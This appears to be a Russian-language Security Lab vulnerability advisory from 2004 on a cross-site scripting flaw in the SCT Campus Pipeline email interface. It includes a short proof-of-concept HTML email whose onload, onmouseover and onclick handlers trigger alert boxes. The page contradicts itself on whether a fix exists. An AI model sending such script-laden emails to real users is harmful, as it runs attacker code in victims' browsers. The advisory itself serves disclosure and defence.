Security Lab

Выполнение произвольных команд приложения в SCT Campus Pipeline

Дата публикации:18.04.2004
Всего просмотров:1057
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: SCT Campus Pipeline
Уязвимые версии: SCT Campus Pipeline

Описание: Уязвимость обнаружена в SCT Campus Pipeline. Удаленный пользователь может выполнить XSS нападение.

e-mail интерфейс не фильтрует некоторые обработчики сценариев, типа onload(), onmouseover(), и onclick(). Удаленный пользователь может послать специально обработанный email, который, когда будет просмотрен целевым пользователем, выполнить произвольный код сценария в браузере целевого пользователя в контексте безопасности SCT Campus Pipeline сайта.

Пример/Эксплоит:

<html>
<body onload="alert('load')">
<img src="http://www.hackthissite.org/avatars/hts.jpg" 
onmouseover="alert('mouse')">;
<img src="http://www.hackthissite.org/avatars/hts.jpg" 
onclick="alert('clicked')">;
</body>
</html>

URL производителя:http://www.sct.com/Education/Products/Connected_Learning/CampusPipeline.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
Ссылки: SCT javascript execution vulnerability